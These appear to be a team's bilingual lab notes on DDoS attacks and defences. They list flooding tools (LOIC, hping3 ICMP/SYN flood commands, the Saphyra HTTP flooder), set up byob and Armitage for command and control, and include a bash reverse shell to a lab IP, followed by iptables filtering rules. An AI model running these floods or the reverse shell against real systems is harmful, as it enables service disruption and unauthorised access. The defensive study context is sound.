DDOS

• DDOS
• 分工
  • 使用的技術
• 攻擊點
  • Bandwidth
  • Memory
• Attack tools
  • low orbit ion cannon
  • hping3
    • ICMP flooding
    • SYN flooding
  • Saphyra
    • Http Get
• analysis tool
  • nload
• C2 server
  • byob
  • LinuxEnv setup
  • Armitage
  • Creating a Listener in Armitage
  • IEEE paper
    • Intelligent Detection System for a Distributed Denial-of - Service (DDoS) Attack Based on Time Series
• Analysis Hping3 攻擊行為
• iptables
  • • flag
  • Filter Table
    • Input chain (in bound 入站)
    • Output chain (out bound 出站)
    • Mac filter (MAC 過濾)
  • Nat Table (NAT 設定)

https://github.com/jgamblin/Mirai-Source-Code/blob/master/ForumPost.md

分工

使用的技術

攻擊者

• Attack Script
• 找最新 Attack 技術

防禦

• ML
• 要去找防禦的技術

Env (For 實驗)

• 建環境或找實體環境

攻擊點

Bandwidth

有papaer -> 可以到 1.7TB/s 的檔案傳輸

Memory

Attack tools

low orbit ion cannon

https://github.com/NewEraCracker/LOIC

Linux

mono(require)

https://www.monodevelop.com/download/#fndtn-download-lin

apt-get install mono-complete

hping3

ICMP flooding

-> Attack bandwidth

hping3 -1 --flood <ip Address>

Wire Shark

Defense -> ICMP disable

SYN flooding

hping3 -d 200 -p 80 -S --flood <ip address>

192.168.86.181
D -> 200 byte

defend -> firewall

Saphyra

Http Get

繞過Firewall 使用不同 userAgent(http header) 來造成混洨

http Get -> request traget host

Script

https://github.com/IkzCx/ProgramsForDDos/blob/master/Saphyra.py

analysis tool

nload

使用方法

nload 

C2 server

byob

byob

DOC

https://github.com/malwaredllc/byob/wiki

LinuxEnv setup

video1
video2
video3

git clone https://github.com/malwaredllc/byob.git

https://github.com/malwaredllc/byob/wiki/Installing-Requirements-on-Linux

apt insatll python2 

Run setup.py

Armitage

https://github.com/Intek13x/armitage

Creating a Listener in Armitage

host:127.0.0.1 
port 55555
Account : meowhecker
Password: meowhecker

Reverse shell

bash -c '0<&103-;exec 103<>/dev/tcp/192.168.203.151/443;sh <&103 >&103 2>&103'

IEEE paper

Intelligent Detection System for a Distributed Denial-of - Service (DDoS) Attack Based on Time Series

Analysis Hping3 攻擊行為

iptables

Linux Firewall

flag

• t table

• A append Rule 加到最後

• I insert Rule "?" default = 1

• v verbose

• I

Filter Table

Input chain (in bound 入站)

Add New Rules

iptables -t filter -A INPUT -j DROP -p tcp --dport 80

Delete Rules

iptables -t filter -D INPUT 1

刪掉第一個Rules

Output chain (out bound 出站)

ping 192.168.203.151
PING 192.168.203.151 (192.168.203.151) 56(84) bytes of data.
64 bytes from 192.168.203.151: icmp_seq=1 ttl=64 time=5.23 ms
64 bytes from 192.168.203.151: icmp_seq=2 ttl=64 time=1.02 ms

iptables -t filter -A OUTPUT -j DROP -p icmp -d 192.168.203.151

root@ubuntu:/home/user# ping 192.168.203.151PING 192.168.203.151 (192.168.203.151) 56(84) bytes of data.
ping: sendmsg: Operation not permitted
ping: sendmsg: Operation not permitted
ping: sendmsg: Operation not permitted
ping: sendmsg: Operation not permitted

Mac filter (MAC 過濾)

(有效)

iptables -A INPUT -m mac --mac-source 00:0c:29:45:2d:c2 -j DROP

Nat Table (NAT 設定)

show

iptables -t nat -L

Nat Table 會有4個chain

• PreRouting(Before Routing)

改 destination IP or Address

可以進行轉發

• INPUT

• OUTPUT

• PostRouting(After Routing)

改 Source IP or Address

Prevent SYN